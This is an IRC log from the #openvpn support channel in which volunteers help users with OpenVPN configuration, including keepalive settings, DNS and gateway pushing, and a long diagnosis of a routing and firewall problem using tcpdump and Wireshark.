10:12 -!- Porkepix [~Porkepix@lns-bzn-29-82-248-243-164.adsl.proxad.net] has quit [Quit: Computer has gone to sleep.]
10:16 -!- staticsafe [~staticsaf@unaffiliated/staticsafe] has left #openvpn ["WeeChat 0.3.9.2"]
10:17 -!- staticsafe [~staticsaf@unaffiliated/staticsafe] has joined #openvpn
10:17 -!- staticsafe [~staticsaf@unaffiliated/staticsafe] has left #openvpn []
10:17 < dvl-_> OK, heading over to EFNET for some ports work...
10:17 -!- dvl-_ [~dan@pool-71-162-210-170.phlapa.fios.verizon.net] has quit [Quit: Killed (einride (Requested by panasync))]
10:21 -!- Porkepix [~Porkepix@lns-bzn-29-82-248-243-164.adsl.proxad.net] has joined #openvpn
10:21 -!- master_of_master [~master_of@p57B556D3.dip.t-dialin.net] has quit [Ping timeout: 252 seconds]
10:23 -!- master_of_master [~master_of@p57B54F45.dip.t-dialin.net] has joined #openvpn
10:27 -!- Porkepix [~Porkepix@lns-bzn-29-82-248-243-164.adsl.proxad.net] has quit [Ping timeout: 252 seconds]
10:36 -!- Porkepix [~Porkepix@lns-bzn-29-82-248-243-164.adsl.proxad.net] has joined #openvpn
10:47 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn
11:03 -!- raidz_away is now known as raidz
11:12 -!- nikoc31337 [~maniac@adsl-26.176.58.244.tellas.gr] has quit []
11:15 -!- ade_b [~Ade@koln-5d817780.pool.mediaWays.net] has joined #openvpn
11:15 -!- ade_b [~Ade@koln-5d817780.pool.mediaWays.net] has quit [Changing host]
11:15 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
11:19 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
11:21 -!- Mimiko [~Mimiko@89.28.88.177] has joined #openvpn
11:24 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
11:24 -!- mode/#openvpn [+o krzee] by ChanServ
11:35 -!- Rolybrau [noident@unaffiliated/rolybrau] has joined #openvpn
11:43 -!- Rolybrau [noident@unaffiliated/rolybrau] has quit [Quit: Rolybrau]
11:57 -!- naquad [~naquad@82.146.43.183] has left #openvpn ["Ухожу я от вас"]
12:00 -!- Azrael808 [~peter@cpc17-walt12-2-0-cust657.13-2.cable.virginmedia.com] has joined #openvpn
12:10 -!- torkelatgenet [~torkelatg@38.84-234-168.customer.lyse.net] has joined #openvpn
12:11 < torkelatgenet> Hello, i am trying to configure an openvpn client on my android, how should i do that?
12:11 < torkelatgenet> should i post my server config?
12:15 <@krzee> !android
12:15 <@vpnHelper> "android" is (#1) an open source OpenVPN client for ICS is available in Google Play, look for OpenVPN for Android. FAQ is here: http://code.google.com/p/ics-openvpn/wiki/FAQ or (#2) If running cyanogenmod, openvpn and busybox are already installed for you! or (#3) If you do not have cyanogenmod or ICS, but your device is rooted, you can use android-openvpn-installer and openvpn-settings from the
12:15 <@vpnHelper> market
12:25 < torkelatgenet> !
12:29 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 272 seconds]
12:31 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
12:58 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has joined #openvpn
13:20 <@dazo> torkelatgenet: if you already got a working config for a computer ... you basically just need to dump the config and additional files to the SD storage and can import it from there
13:20 <@dazo> iirc
13:20 <@krzee> ^^ yep
13:42 -!- Mimiko [~Mimiko@89.28.88.177] has quit []
13:43 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 244 seconds]
13:49 -!- k1ng [~k1ng@unaffiliated/k1ng] has quit [Read error: Connection reset by peer]
13:50 -!- k1ng [~k1ng@unaffiliated/k1ng] has joined #openvpn
14:11 < videl> Do you guys happen to have a documentation or a lesson on TCP/IP Routing ? I found one on Google, but wondered if you guys use a special one
14:11 <+pekster> !tcpip
14:11 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know
14:11 < videl> Ah, thanks
14:17 -!- brute11k [~brute11k@89.249.230.141] has quit [Ping timeout: 260 seconds]
14:21 -!- raidz is now known as raidz_away
14:23 -!- raidz_away is now known as raidz
14:38 -!- i7c [~i7c@212.47.190.111] has joined #openvpn
14:38 < i7c> what to use, easy-rsa 1.0 or 2.0?
14:42 <@krzee> 2.0
14:42 <@krzee> !easy-rsa
14:42 <@vpnHelper> "easy-rsa" is (#1) easy-rsa is a certificate generation utility. or (#2) Download here: https://github.com/OpenVPN/easy-rsa/downloads or (#3) Download easy-rsa from GitHub at https://github.com/OpenVPN/easy-rsa
14:43 < i7c> thx
14:54 <@ecrist> 2.0
14:54 <@ecrist> or, ssl-admin
14:54 <@ecrist> new version released today
14:55 < d1gital> what do the W's in the output mean at verb 5?
14:57 <@dazo> d1gital: that a write operation is happening on either the tun/tap device or the TCP/UDP socket ... All 'w' are the "other" socket (TCP/UDP or tun/tap) ... but I always forget and mix up which is which
14:57 <@dazo> d1gital: it's the same with R/r too
15:00 < d1gital> dazo: I see.
15:01 < d1gital> Only my client reports "Initialization sequence completed", and my server does not.
15:01 < d1gital> after that, the client says "Invalid argument (code=22)", and the server just prints some W's
15:11 <@plaisthos> d1gital: educated guess, dev tun vs dev tap
15:30 < i7c> how to prevent openvpn from doing that double-ip thingy? my clients all have an ip and a "destination"... I think that was something necessary on windows
15:30 < i7c> I don't want it tho
15:30 < ngharo> !topology
15:30 <@vpnHelper> "topology" is (#1) it is possible to avoid the !/30 behavior if you use 2.1+ with the option: topology subnet This will end up being default in later versions. or (#2) Clients will receive addresses ending in .2, .3, .4, etc, instead of being divided into 2-host subnets. or (#3) See http://osdir.com/ml/network.openvpn.devel/2005-09/msg00020.html for more history on this.
15:31 < ngharo> so you want 'topology subnet'
15:31 < ngharo> instead of the /30
15:31 < ngharo> !/30
15:31 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet (4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf
15:31 < i7c> will read, thanks
15:49 < i7c> is there an option to "push nothing" to the client? so that I can freely configure my routing table manually?
15:49 <+rob0> uh ... don't use "push" on the server side if you want to push nothing
15:50 <+rob0> you might also be interested in:
15:50 <+rob0> --route-nopull
15:51 < i7c> might be what I'm looking for. I don't use push at all but it still adds the default routes for the tun device
15:51 < i7c> which is no problem but I like it clean ;)
16:09 <+EugeneKay> ecrist mattock - who is paying for the shirts, anyway? Just donation slush fund?
20:39 < plut0> this the correct channel for adito support?
20:50 < plut0> anyone?
20:55 < chrisb> yes?
20:56 < plut0> this the correct channel for adito support?
20:57 < chrisb> plut0: ? openvpn
21:00 < plut0> this differ from openvpn-als?
21:01 <+EugeneKay> !as
21:01 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server
21:01 <+rob0> openvpn-als? is that Lou Gehrig's openvpn?
21:02 < plut0> http://sourceforge.net/projects/openvpn-als/
21:02 <@vpnHelper> Title: OpenVPN ALS | Free software downloads at SourceForge.net (at sourceforge.net)
21:03 < plut0> am I in the wrong place?
21:08 <+rob0> If mattock is the same one as from OpenVPN ALS, you're probably in the right place.
21:08 <+rob0> but I know nothing about OpenVPN ALS
21:08 < plut0> mattock?
22:33 <+pekster> i7c: You might also look at --route-noexec which doesn't add any routes and passes them as env-vars to a script defined by --route-up. Using subnet topology you need the local subnet as a route to simply reach the peer or other clients on the network
--- Day changed Fri Jan 04 2013
05:49 < Cpt-Oblivious> I got 2 networks. Both 192.168.1.x, on 1 of them I run OpenVPN, and it has 10.248.12.1 as gateway ip and hands out 10.248.12.x ip addresses. How would I get other PC's on the 192.168.1.x network of the server to be accessible for the clients that get dealt the 10.248.12.x ip addresses? I tried giving the pc's on the server side lan another IP address like 10.248.12.50 for example. But that doesn't work. What route or something should I push to the clients / place in my server config?
06:00 <@plaisthos> You should avoid the same subnet
06:01 <@plaisthos> for 2.3 you can look into client-nat
06:01 <@plaisthos> !samenetwork
06:03 <@plaisthos> !samesubnet
06:03 <@vpnHelper> "samesubnet" is (#1) clients can not connect to a server pushing its lan if on the same subnet. you can only reach your subnet on layer2 or through your gateway, when you create a route for it you will try to reach your gateway over the vpn which dies because you can't reach your gateway or (#2) you can use --client-nat if on 2.3 to work around changing the subnet, but you should still just change the subnet
06:05 < Cpt-Oblivious> Hmm
06:06 <@plaisthos> otherwise you need nat/routing rules which in most cases give more headaches than renumbering
06:06 <@plaisthos> especially since that often leads to subtle errors
06:07 < Cpt-Oblivious> I currently also have a RAS pptp vpn running. And with that I just assigned all servers in the 192.168.1.x LAN also a 10.248.11.x ip address
06:07 < Cpt-Oblivious> And that's pingable
06:07 < Cpt-Oblivious> but a friend configured that mostly, so I'm not sure if it's natting. Let's see.
06:08 < Cpt-Oblivious> Can't you just have OpenVPN act as a router for 10.248.12.x?
06:08 <@plaisthos> sure
06:08 < Cpt-Oblivious> And that if other pc's in the 192.168.1.x subnet want to connect, you can just use 10.248.12.1 as gateway for them and 10.248.something as their ip address?
06:09 <@plaisthos> but openvpn does not do the routing, the computer on which openvpn runs has to do the routing
06:09 < Cpt-Oblivious> like assign that as second static ip address?
06:10 < Cpt-Oblivious> Hmmm
06:12 < Cpt-Oblivious> Can't I add like a rule on my router, that if anything in the subnet wants to reach a 10.248.12.x address, that they have to go to 10.248.12.1 which is the OpenVPN server?
06:12 < Cpt-Oblivious> And doesn't the OpenVPN server then forward it to its clients?
06:13 <@plaisthos> yes sure
06:13 < Cpt-Oblivious> So if I'd add a rule that says 10.248.12.x -> 10.248.12.1
06:13 < Cpt-Oblivious> then it'd work?
06:13 <@plaisthos> openvpn forwards to its clients whatever enters the tun device
06:14 <@plaisthos> if you give out 10.248.12.0/24 to your clients openvpn expects all of these ips to be clients
06:16 < Cpt-Oblivious> Ooh I didn't, I gave like 30 ip's to clients
06:19 <@plaisthos> You have an OpenVPN network like 10.248.12.0/27 and a normal network like 10.248.12.0/24 and are wondering why it does not work?
06:20 < Cpt-Oblivious> Uhh
06:20 < Cpt-Oblivious> I got a 192.168.1.x network
06:20 < Cpt-Oblivious> On which all servers connect to get internet
06:20 < Cpt-Oblivious> 1 of those servers, 192.168.1.146 is the OpenVPN server
06:20 < Cpt-Oblivious> The OpenVPN server has 10.248.12.1 as IP address
06:21 < Cpt-Oblivious> And gives clients IP addresses like 10.248.12.6 or 10.248.12.10
06:21 < Cpt-Oblivious> other servers on that 192.168.1.x network, like 192.168.1.141, I tried giving them also an address like 10.248.12.50, and I want clients to be able to reach that.
06:22 <@plaisthos> yeah, like I said :)
06:22 <@plaisthos> you have two different 10.248.12.0 networks
06:22 <@plaisthos> one of openvpn and one in your lan
06:22 < Cpt-Oblivious> I guess?
06:23 <@plaisthos> You should read more about routing, but for starters change one of the networks and add a route for the other network on both sides
06:24 < Cpt-Oblivious> I guess the part that got me confused is that I do like the exact same thing with RAS. I give clients 10.248.11.2 addresses for example, server is 10.248.11.1, and I also added 10.248.11.50 addresses as second IP on other servers. And that works
06:26 <@plaisthos> yes ras works differently
06:26 <@plaisthos> ras is like a mix of tun and tap iirc
06:26 < Cpt-Oblivious> Yea looks like that
06:33 < Cpt-Oblivious> Thanks for your advice though. I think I'm going to change the subnet serverside first. Sounds like the least painful solution.
08:04 < i7c> how come my openvpn has such bad performance compared to an ssh tunnel? it happens quite some time that the latency goes up (I open a web page and it takes like 20 seconds until I get a response) also speedtests are worse.
08:04 < i7c> I use udp and no compression.
08:06 < i7c> also I noticed the server has a very high cpu usage (~60%) while the client has like 2%... ok different CPUs but still
08:12 <@dazo> i7c: depends on firewalling, routing, DNS, and if your ISPs on both server and client side have good performance over UDP ... basically your complete configuration setup .... for me VPN and SSH tunnels do not have any difference at all
08:13 < i7c> dazo: so could it even be that tcp has better performance?
08:15 <@dazo> i7c: in some cases, some ISPs really cripple UDP traffic
08:16 < i7c> oh ok. I will test this. also I could really need some tools for testing my server's network performance
08:16 <@dazo> i7c: iperf is pretty decent for that
08:16 < i7c> thanks! I'll check it out
08:16 <@dazo> it can test udp and tcp ... and you can then test it outside and inside the tunnel ... to see if it's your connection or vpn setup
08:17 <@dazo> which is troubling you
08:17 * dazo heads out for a while
08:17 < i7c> :)
08:17 < i7c> awesome
08:17 < i7c> thanks
08:17 < i7c> till then
08:44 < i7c> okay so my performance via openvpn is way worse, but udp is still better... what else could I tweak?
09:09 < ExxKA> Hey Guys. I have a problem where my VPN connection is dropped after about 1 hour. I am using Tunnelblick. I know you are not a Tunnelblick support channel but I thought you may have an idea?
09:10 <@ecrist> what's the error
09:24 < ExxKA> ecrist, there is no error, other than traffic routed through the vpn never makes it (after the 1 hour)
09:24 < ExxKA> The connection seems to be active, but in practice it is not
09:25 < ExxKA> I have been thinking that maybe it is a timeout setting on the dns settings or routes used?
09:25 < ExxKA> Or maybe a parameter server side? To be honest I do not use the routes very often as they only lead to my git repository
09:26 < ExxKA> So it may be that it's a timeout because I have not used the connection. I would just think that the connection was still kept alive?
09:28 <@ecrist> ExxKA: what do your openvpn logs indicate? If you're using UDP for the VPN, you might be hitting a UDP state timeout on a router/firewall (yes, I know, UDP is stateless)
09:28 <@ecrist> do you have a keepalive in the openvpn configuration?
09:29 < ExxKA> Good question. Do you know where the logs reside?
09:29 <@ecrist> !logs
09:29 <@vpnHelper> "logs" is (#1) please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client (OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client (Tunnelblick) right-click it and select Copy log text to clipboard or (#4) if you don't know how to find your logs, see !logfile
09:29 < ExxKA> !logfile
09:29 <@vpnHelper> "logfile" is (#1) openvpn will log to syslog if started in daemon mode. You can manually specify a logfile with: log /path/to/logfile or (#2) verb 3 is good for everyday usage, verb 5 for debugging or (#3) see --daemon --log and --verb in the manual (!man) for more info
09:29 < ExxKA> Hmm ok
09:30 < ExxKA> No I have no keepalive setting
09:30 < ExxKA> That may be it!
09:32 < ExxKA> Nope.
09:32 < ExxKA> It seems that by default keepalive is forever
09:32 < ExxKA> or --inactive 0 :)
09:33 <@ecrist> so, you need to add a keepalive
09:33 <@ecrist> usually --keepalive 5 10 or so is more than sufficient
09:33 <@ecrist> or even 10 60
09:33 < ExxKA> can I add it to any of the lines in my configuration file?
09:34 <@ecrist> it's a new line
09:34 < ExxKA> I suppose it will just be "keepalive 10 60" on a line by itself?
09:34 <@ecrist> yup
09:34 < ExxKA> Thanks
09:34 < ExxKA> I will give it a go :)
09:37 <@dazo> i7c: You might learn a few tricks here ... https://community.openvpn.net/openvpn/wiki/Gigabit_Networks_Linux
09:37 <@vpnHelper> Title: Gigabit_Networks_Linux – OpenVPN Community (at community.openvpn.net)
10:30 < kisom> Made my computers lock their screens when OpenVPN disconnects
10:31 <+hazardous> o_O
10:31 < kisom> It's quite nice in fact. Imagine if someone stole the machine.
10:31 < kisom> Then they wouldn't have access to my files any more.
10:33 <@ecrist> all because of a screen lock
10:34 <+hazardous> yolo
10:46 < kisom> ecrist: And full disk encryption.
11:32 <@plaisthos> kisom: does your notebook have a pcexpress card?
11:32 <@plaisthos> or thunderbolt?
11:35 <@krzee> MacBookPro CPU: Intel Core i7 M 620 2.67GHz @ 2.66GHz [SSE3/SSSE3/SSE4.1/SSE4.2/x86_64/PAE/XD/VT/EST/OctaCore] L3: 4MB QPI: 4.8 GT/s RAM: 3.2GB/8.0GB swap: 0.00M/64.00M Disk: 167.48GB/173.85GB GPU: NVIDIA GeForce GT 330M & Intel HD Graphics [512 MB & 288 MB/Stock] 1920x1200 OS: Mac OS X 10.7.5 (11G63) Kernel: 11.4.2 Arch: 64 Bit
11:38 <@krzee> mine has an expresscard slot
11:44 <@plaisthos> yeah, full disc encryption is compromised by these extensions
11:44 <@plaisthos> since you get dma capabilities and can read the full memory of the notebook
11:45 <@plaisthos> (if the notebook is on, of course)
11:45 <@plaisthos> this btw. is the reason why the xbox 360 processor has embedded ram on the cpu die to keep the keys from going into main memory
11:47 < chrisb> plaisthos: good details
11:49 <@plaisthos> never underestimate your attackers :)
11:50 <@plaisthos> last time I checked (about 3 years ago) you could dump a macbook's memory with firewire
11:50 <@plaisthos> and firewire is cheap and freebsd even has a dev/firewire mem device to make this easy for you ....
12:12 <@ecrist> kisom: screen lock doesn't do anything with disk encryption
12:23 < miha> trying to configure windows openvpn client. I use vpn as gateway, think I need to set dns too
12:23 < miha> I'm pretty sure server pushes dns, but windows client so far ignores it?
12:24 <@dazo> miha: nope ... windows clients do not ignore it ... make sure you use --push "dhcp-option $DNS_IP" in your server config
12:25 < miha> I have it without -- ?
12:26 < miha> push "dhcp-option DNS 193.xxx...."
12:27 < miha> works on ubuntu client
12:27 < Cpt-Oblivious> plaisthos, we're changing the server side subnet from 192.168.1.0/24 to 192.168.0.0/24 now.
12:27 <+pekster> miha: You should see that DNS server under the TAP-Win32 adapter if you do 'ipconfig /all' in a prompt
12:27 < Cpt-Oblivious> Had to wait for my friend to come online. Server is hosted at his home network since he has 100/100 mbps fiber.
12:30 < miha> pekster: you're right. dns is there. default gateway isn't
12:31 < miha> what is the command to use vpn as gateway??
12:32 < miha> I googled forum posts
12:33 < miha> redirect-gateway ?
13:56 < Cpt-Oblivious> Miha, it is indeed the redirect-gateway one.
14:00 < Cpt-Oblivious> Hmm.... All pc's in my subnet can ping all VPN clients.
14:00 < Cpt-Oblivious> But the VPN clients can only ping the OpenVPN server, what setting am I missing?
14:01 <+pekster> Cpt-Oblivious: What is it you want? Clients to reach other clients, or the LAN? and is the LAN behind the VPN server or a client?
14:02 <@ecrist> !goal
14:02 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server, I would like to access the internet over my vpn, I just want a secure connection between 2 computers, etc
14:03 < Cpt-Oblivious> At the moment I got a 192.168.0.x LAN, in which the OpenVPN server is situated. Clients connect from a 192.168.1.x LAN. They get assigned an ip address out of the 10.248.12.x pool. 192.168.0.146 / 10.248.12.1 is the OpenVPN server. Right now, all clients can connect and can ping both ip addresses of the OpenVPN server. They can however not ping any other 192.168.0.x ip address. All other servers in the 192.168.0.x subnet can ping every 10.248.12.x client though.
14:04 < Cpt-Oblivious> I've got IP forwarding enabled on the OpenVPN server. So that can't be it.
14:05 <+pekster> Sounds like a firewall issue to me, unless you're performing SNAT on traffic bound for the VPN network
14:05 < Cpt-Oblivious> A firewall issue on the OpenVPN server then I guess?
14:06 < Cpt-Oblivious> All clients from 192.168.0.x just talk to their gateway, 192.168.0.1 and that gateway tells them that they can find 10.248.12.x people at 192.168.0.146 (the open vpn server). And that works beautifully.
14:06 < Cpt-Oblivious> The communication in the other way isn't working though. The vpn clients try to talk to 192.168.0.x pc's. But the OpenVPN server isn't forwarding those requests to the router.
14:06 < Cpt-Oblivious> It only answers when asked on its own 192.168.0.146 address.
14:09 <+pekster> So: are you using NAT?
14:09 < Cpt-Oblivious> Not that I'm aware of.
14:09 <+pekster> Clearly routing is working fine since the reply from the VPN clients makes it back to the server-side LAN systems 14:09 < Cpt-Oblivious> The OpenVPN server should just forward all 192.168.0.x requests to the router / gateway and then all will be fine. 14:09 <+pekster> So, you're left with a firewall 14:09 <+pekster> What OS? 14:09 < Cpt-Oblivious> Ubuntu 12.04 14:10 <+pekster> Can you pastebin the output of 'iptables-save' ? 14:10 < Cpt-Oblivious> ofc, sec 14:11 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 14:11 < Cpt-Oblivious> that outputs nothing 14:11 < Cpt-Oblivious> I can show you what iptables--list outputs though? 14:12 <+pekster> If you have any firewall rules, 'iptables-save' dumps them in the most usable format for diagnostic purposes. How does it show you "nothing" ? 14:12 < Cpt-Oblivious> I did that in the command line and it doesn't output anything 14:12 < Cpt-Oblivious> it just executes it 14:12 < Cpt-Oblivious> or do i have to go to some file where the rules get saved into? 14:13 -!- Guest31276 [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has joined #openvpn 14:13 < Cpt-Oblivious> www.pastebin.com/ZzqEEEyC 14:13 <+pekster> As root? '/sbin/iptables-save' should never output nothing unless you don't have iptables support in your kernel :\ 14:13 <+pekster> Ah, okay, so you literally have no filtering, got it 14:13 < Cpt-Oblivious> ah, i didn't run it as root 14:13 < Cpt-Oblivious> now i get output 14:14 < Cpt-Oblivious> www.pastebin.com/j0tHFwjG 14:14 <+pekster> Well, the output you just gave works too (iptables-save is just easier to read than any 'iptables' output, but your rules are fully empty and accept all traffic.) 14:15 <+pekster> So, I'm left wondering if the clients themselves are the ones dropping the traffic. 
If you can ping from a LAN client on 192.168.0/24 to a VPN client on 10.248.12/24, you know routing and firewalls are permissive of that traffic 14:15 < Cpt-Oblivious> yea 14:15 < Cpt-Oblivious> that works 14:15 <+pekster> Try a tcpdump on the VPN server's LAN iface as you ping from VPN client to server. You should see an echo-request go out to the client LAN IP, then an echo-reply come back 14:16 <+pekster> My guess is you only see the request, not the reply. The solution there is to fix the LAN client's firewall to allow the request 14:16 < Cpt-Oblivious> So I start a ping -t towards any of the 192.168.0.x clients except for the server since that one works 14:16 < Cpt-Oblivious> and then do a TCP dump? 14:16 <+pekster> Erm, ping from the client to the LAN system, I mean 14:16 < Cpt-Oblivious> yea 14:16 < Cpt-Oblivious> that's that 14:17 < Cpt-Oblivious> the clients got 192.168.1.x natively. And get a 10.248.12.x assigned. So i ping from 10.248.12.x towards any of the 192.168.0.x computers on the server side. Except for 192.168.0.146 since that is the OpenVPN server and that works. 14:18 <+pekster> That's the issue you started with, right? So you're still not getting replies? What does the tcpdump show you? 14:18 < Cpt-Oblivious> ooh 14:18 < Cpt-Oblivious> I have an idea 14:19 <+pekster> Assuming eth0 is your LAN iface on the server, 'tcpdump -pnvi eth0 icmp' will show you what you want 14:19 < Cpt-Oblivious> Shouldn't I have something in my client config which tells my client that if i want to talk to 192.168.0.x people that i have to forward everything to 10.248.12.1 / 192.168.0.146 (the open VPN server) 14:19 < Cpt-Oblivious> shouldn't there be a static route like 192.168.0.0/24 to 10.248.12.1 or something? 14:20 <+pekster> You must already have that if your LAN network clients can ping 10.248.12/24 directly 14:20 <+pekster> Yes, there should. 
Unless you've mis-stated your problem in your original description, you already have that 14:20 < Cpt-Oblivious> I don't have that :P 14:20 < Cpt-Oblivious> and it works :P 14:21 < Cpt-Oblivious> The only thing i did is add a route on my gateway on the server side. Which tells all 192.168.0.x computers that if they want to chat to a 10.248.12.x vpn client, that they have to go to the 192.168.0.146 ip of the server. 14:21 < Cpt-Oblivious> I physically added that on the router. 14:21 <+pekster> Okay, then you made a mistake when you said "All other servers in the 192.168.0.x subnet can ping every 10.248.12.x client though." 14:21 < Cpt-Oblivious> No they can. 14:21 < Cpt-Oblivious> Any 192.168.0.x server can ping any client in 10.248.12.x, they'll get replies. 14:21 < Cpt-Oblivious> the other way around just doesn't work. 14:21 <+pekster> Then you have that return route already 14:22 <+pekster> It's not a routing problem. It's a firewall problem 14:22 < Cpt-Oblivious> let me shut down the firewalls on both machines 14:22 < Cpt-Oblivious> sec 14:22 < Cpt-Oblivious> ooh it's off already :p 14:22 <+pekster> Look at it this way: the reply goes from the 10.248.12/24 network to the 192.168.0/24 network. Since you get the reply that follows that path, you can infer you have the required route already 14:23 < Cpt-Oblivious> Yea 14:23 < Cpt-Oblivious> they can reply 14:23 < Cpt-Oblivious> they just can't figure out where to start talking on their own. 14:23 <+pekster> This means routing is fine 14:23 <+pekster> So, that tcpdump? 14:23 <+pekster> What did you learn from it? 14:23 < Cpt-Oblivious> yes, let me do that. 1 sec. 14:24 < Cpt-Oblivious> but 14:24 < Cpt-Oblivious> i got the vpn as udp configured 14:24 < Cpt-Oblivious> should i make it an udp dump? 14:25 <+pekster> No. 
We don't care about the encrypted traffic 14:25 <+pekster> You care about pings 14:25 < Cpt-Oblivious> ok 14:25 <+pekster> So, dump icmp traffic on your LAN, just as I asked 14:26 < Cpt-Oblivious> doing that dump now 14:26 < Cpt-Oblivious> www.pastebin.com/A3hFEabS 14:28 <+pekster> Requests go out, and no replies come back. Your problem is your LAN system's firewall on 192.168.0.141 14:28 < Cpt-Oblivious> those icmp's / pings all time out. I'm trying to ping 192.168.0.141 from 10.248.12.6. 14:28 < Cpt-Oblivious> other way around works though 14:28 < Cpt-Oblivious> 192.168.0.141 is a windows server 2008r2 with the firewall disabled. 14:28 <+pekster> Apparently not 14:29 < Cpt-Oblivious> well.. it is :p 14:29 < Cpt-Oblivious> domain / private / public, all off. 14:29 <+pekster> Maybe the firewall on the LAN's default gw? 14:29 <+pekster> Somewhere a firewall is dropping the reply traffic 14:30 < Cpt-Oblivious> yea 14:30 < Cpt-Oblivious> Can i do a TCP dump on a windows server 2008r2 in command prompt or powershell? 14:30 < Cpt-Oblivious> so i can see if that one is dropping it? 14:30 <+pekster> You can install Wireshark 14:30 < Cpt-Oblivious> damn it :P 14:30 < Cpt-Oblivious> already feared that was the answer :P 14:30 < Cpt-Oblivious> ok on it. 14:31 <+pekster> That'll tell you if the 192.168.0.141 IP is even replying. If it is, then the only other system in the way is the LAN's gw system (which presumably has a firewall of its own) 14:31 <+pekster> Even if it has the route (which again, we know since traffic works the other way) it still needs to allow it 14:31 < Cpt-Oblivious> installing wireshark portable atm 14:32 < Cpt-Oblivious> done 14:33 < Cpt-Oblivious> let's see 14:33 < Cpt-Oblivious> nope 14:33 < Cpt-Oblivious> never reaches the win 2008r2 server 14:33 < Cpt-Oblivious> nothing of 10.248.12.6 in the entire capture 14:34 < Cpt-Oblivious> nothing of the openvpn server either 14:34 <+pekster> Dumping on its LAN interface 14:34 <+pekster> ? 
14:34 < Cpt-Oblivious> hmm 14:35 < Cpt-Oblivious> that filter isn't working as i thought it would 14:35 < Cpt-Oblivious> running capture again 14:35 <+pekster> Just do 'icmp' as your capture filter 14:35 <+pekster> (same as for tcpdump) 14:35 <+pekster> And make sure the correct interface is used 14:35 < Cpt-Oblivious> ah 14:35 < Cpt-Oblivious> I see 2 packets 14:36 < Cpt-Oblivious> 10.248.12.6 as source 14:36 < Cpt-Oblivious> destination 192.168.0.141 14:36 < Cpt-Oblivious> ping request 14:36 < Cpt-Oblivious> icmp 14:36 < Cpt-Oblivious> about 5 seconds in between, about the time between icmp time outs 14:36 <@plaisthos> no ping reply? 14:37 <+pekster> If you don't see any reply traffic, then your local system is not generating any replies 14:37 <+pekster> That 192.168.0.141 system isn't also on the VPN network, is it? 14:37 <+pekster> (that would screw things up) 14:37 < Cpt-Oblivious> nope it isn't. 14:37 <+pekster> Then it's a local firewall ;) 14:37 < Cpt-Oblivious> that 192.168.0.146 is the OpenVPN server. 192.168.0.141 is the file server. 14:38 < Cpt-Oblivious> ooh 14:38 < Cpt-Oblivious> i see ping replies as well 14:38 < Cpt-Oblivious> source: 192.168.0.141 to 10.248.12.6 14:38 <+pekster> Then repeat the same procedure on the LAN's gateway, because that reply is never making it to the VPN server 14:38 < Cpt-Oblivious> echo (ping) reply 14:39 <@plaisthos> Cpt-Oblivious: look at the mac addresses of icmp request and icmp reply 14:39 <@plaisthos> they should be the same in reverse order 14:39 <+pekster> plaisthos: Not in this case, because the VPN server is attached to the LAN but not the LAN's default gw 14:39 <@plaisthos> pekster: oh okay 14:40 <@plaisthos> so the lan default gw has a route going back to the vpn server? 14:40 <+pekster> Yup. 
Pings work the other way around 14:40 < Cpt-Oblivious> the ping reply is like instantly generated 14:40 <@plaisthos> nevermind then 14:40 <+pekster> So now it looks like the LAN gw is the firewall having problems 14:40 < Cpt-Oblivious> time of ping request: 1.45023600 14:40 <+pekster> Cpt-Oblivious: Check/fix your firewall on the gateway of your LAN 14:40 < Cpt-Oblivious> time of ping reply: 1.4503500 14:41 < Cpt-Oblivious> Hmmm 14:41 <@krzee> can be verified by bypassing the gw for a lan machine 14:41 < Cpt-Oblivious> how would i do that? 14:41 <@krzee> if it works then, then its for sure the gw's fault 14:41 <@krzee> its explained in: 14:41 <@krzee> !route 14:41 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 14:41 <@krzee> under ROUTES OUTSIDE OPENVPN 14:42 <+pekster> Add a route on 192.168.0.141 that routes 10.248.12/24 via 192.168.0.146 14:42 <@krzee> "the annoying work-around would be to add the route to every box on the LAN, in which case step 3 above would work." 14:42 <@krzee> ya that ^ 14:42 < Cpt-Oblivious> I got that pekster 14:42 <+pekster> (that's really a hack, but it'll identify the LAN gw as your problem without a doubt) 14:42 <@krzee> exactly 14:42 <+pekster> Unless you like manual routes on an entire subnet :P 14:42 <+pekster> More interns! 14:43 <@krzee> hahah 14:43 < Cpt-Oblivious> on my router / gateway I got a '10.248.12.0 with 255.255.255.0 to 192.168.0.146' static route. 14:43 <+pekster> Fix your *firewall*. 
